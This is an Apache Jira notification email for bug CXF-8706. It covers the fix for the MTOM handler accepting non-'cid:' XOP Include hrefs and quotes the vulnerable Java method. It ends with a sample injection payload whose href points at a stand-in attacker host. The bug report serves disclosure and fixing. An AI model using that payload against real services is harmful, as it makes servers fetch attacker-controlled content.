[jira] [Comment Edited] (CXF-8706) CXF MTOM handler allow content injection

Mon, 19 Dec 2022 17:59:05 -0800 


    [ 
https://issues.apache.org/jira/browse/CXF-8706?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17649529#comment-17649529
 ] 

Andriy Redko edited comment on CXF-8706 at 12/20/22 1:58 AM:
-------------------------------------------------------------

[~bergers] the fix disables arbitrary data sources by default, w/o MTOM 
enabled. Regarding the usage of the `SOAPBinding.isMTOMEnabled()`, I am not 
sure, seems like Apache CXF have alternative 
{*}`{color:#000000}Message.{color}{*}{color:#0000c0}MTOM_ENABLED`{color}{color:#172b4d}
 {color}{color:#172b4d}contextual property to control this behavior, thank you. 
{color}


was (Author: reta):
[~bergers] the fix disables arbitrary data sources by default, w/o MTOM 
enabled. Regarding the usage of the {{SOAPBinding.isMTOMEnabled(), }}I am not 
sure, seems like Apache CXF have alternative 
{*}`{color:#000000}Message.{color}{*}{color:#0000c0}MTOM_ENABLED`{color}{color:#172b4d}
 {color}{color:#172b4d}contextual property to control this behavior, thank you. 
{color}{color:#172b4d}
{color}

> CXF MTOM handler allow content injection
> ----------------------------------------
>
>                 Key: CXF-8706
>                 URL: https://issues.apache.org/jira/browse/CXF-8706
>             Project: CXF
>          Issue Type: Bug
>          Components: JAXB Databinding
>    Affects Versions: 3.5.2
>            Reporter: Chunqing Lin
>            Assignee: Andriy Redko
>            Priority: Major
>             Fix For: 3.4.10, 3.5.5, 4.0.0, 3.6.0
>
>
> When used with SOAP web service or JAXRS web service with MTOM enabled, 
> Unmarshaller allows XOP Include tag to have href attributes that allow any 
> protocols.  According to the W3C MTOM spec, only "cid:" should be allowed for 
> href scheme.
> The affected call stack is:
>     AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) 
> line: 554    
>     JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49    
>     MTOMDecorator.startElement(TagName) line: 70    
> The source code is:
> public static DataSource getAttachmentDataSource(String contentId, 
> Collection<Attachment> atts) {
>         // Is this right? - DD
>         if (contentId.startsWith("cid:")) {
>             try {
>                 contentId = URLDecoder.decode(contentId.substring(4), 
> StandardCharsets.UTF_8.name());
>             } catch (UnsupportedEncodingException ue) {
>                 contentId = contentId.substring(4);
>             }
>             return loadDataSource(contentId, atts);
>         } else if (contentId.indexOf("://") == -1) {
>             return loadDataSource(contentId, atts);
>         } else {// should only take cid for XOP
>             try {
>                 return new URLDataSource(new URL(contentId));
>             } catch (MalformedURLException e) {
>                 throw new Fault(e);
>             }
>         }
>     }
>  
> The exploit can send payload containing:
> <stringvalue><inc:Include href="http://attackers.site/exploit/payload"; 
> xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

Reply via email to